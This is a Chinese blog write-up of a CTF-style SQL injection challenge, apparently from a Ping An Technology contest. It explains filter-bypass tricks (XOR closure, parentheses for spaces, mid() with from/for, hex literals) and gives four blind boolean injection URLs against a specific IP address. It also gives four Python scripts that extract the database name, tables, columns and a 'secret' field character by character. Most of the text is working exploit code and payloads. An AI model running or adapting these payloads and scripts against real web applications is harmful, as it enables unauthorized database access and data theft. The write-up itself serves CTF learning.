美文网首页
平安科技的一道sql注入

平安科技的一道sql注入

作者: _阿烨_ | 来源:发表于2017-11-05 19:41 被阅读0次

    考点

    异或闭合 '^1^',两空字符异或是0,0和1异或结果是1

    空格,%0b被过滤,用()绕过,绕的时候很容易眼花

    ord、ascii、substr被过滤,而且没法用空格或者/**/绕过
    mid没被过滤,可以用mid查询字母对比,但是mysql数据库是不分大小写,所以查询结果无法区分大小写

    逗号被过滤
    limit 0,1用limit 1 offset 0代替、
    substr(字符串,2,1) 用 substr(字符串 from 2 for 1)代替、

    但是这里学到了一个姿势,可以不用limit
    select group_concat(distinct(table_name)) 可以查多个表名列名

    用 where(table_schema)in(0x776562))的形式来代替 where table_schema='web'

    用 in(0x十六进制) 的形式来代替 ='a'

    凡是库表列名都用十六进制表示

    这里给出四句关键的payload

    http://54.222.188.152:25718/index.php?id='^(mid(database()from(0)for(1))in(0x61))^'
    
    http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(table_name)))from(information_schema.tables)where(table_schema)in(0x776562))from(0)for(1))in(0x61))^'
    
    http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(column_name)))from(information_schema.columns)where(table_name)in(0x6d657373616765))from(0)for(1))in(0x61))^'
    
    http://54.222.188.152:25718/index.php?id='^(mid((select(group_concat(distinct(secret)))from(web.message))from(0)for(1))in(0x61))^'
    
    Paste_Image.png Paste_Image.png

    database.py

    import requests
    url="http://54.222.188.152:25718/index.php?id="
    #chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
    result=''
    for i in range(0,10):
        i =str(i)
        for j in chars:
            j=hex(ord(j))
            payload = "'^(mid(database()from(%s)for(1))in(%s))^'"%(i,j)
    #       print url+payload
            r=requests.get(url+payload)
    #       print r.text
            if 'Hello' in r.text:
                result +=chr(int(j,16))
                print result
    

    table.py

    import requests
    url="http://54.222.188.152:25718/index.php?id="
    #chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
    result=''
    for i in range(0,50):
        i =str(i)
        for j in chars:
            j=hex(ord(j))
            payload = "'^(mid((select(group_concat(distinct(table_name)))from(information_schema.tables)where(table_schema)in(0x776562))from(%s)for(1))in(%s))^'"%(i,j)
    #       print url+payload
            r=requests.get(url+payload)
    #       print r.text
            if 'Hello' in r.text:
                result +=chr(int(j,16))
                print result
    

    column.py

    import requests
    url="http://54.222.188.152:25718/index.php?id="
    #chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
    result=''
    for i in range(0,50):
        i =str(i)
        for j in chars:
            j=hex(ord(j))
            payload = "'^(mid((select(group_concat(distinct(column_name)))from(information_schema.columns)where(table_name)in(0x6d657373616765))from(%s)for(1))in(%s))^'"%(i,j)
    #       print url+payload
            r=requests.get(url+payload)
    #       print r.text
            if 'Hello' in r.text:
                result += chr(int(j,16))
                print result             
    

    dump.py

    #!coding:utf-8
    import requests
    url="http://54.222.188.152:25718/index.php?id="
    chars = 'abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],. ' #这里缩小了字符集合
    #chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{\}?!:@#$%&()[],. '
    #mysql数据库是不分大小写的,这里由于ord和ascii都被过滤了,所以只能用in查询字母对比,所以是无法区分大小写,大小写查询都对
    result=''
    
    for i in range(0,100):
        i =str(i)
        for j in chars:
            j=hex(ord(j))
            payload = "'^(mid((select(group_concat(distinct(secret)))from(web.message))from(%s)for(1))in(%s))^'"%(i,j)
    #       print url+payload
            r=requests.get(url+payload)
    #       print r.text
            if 'Hello' in r.text:
                result += chr(int(j,16))
                print result
    
    Paste_Image.png Paste_Image.png Paste_Image.png Paste_Image.png Paste_Image.png

    相关文章

      网友评论

          本文标题:平安科技的一道sql注入

          本文链接:https://www.haomeiwen.com/subject/lccqmxtx.html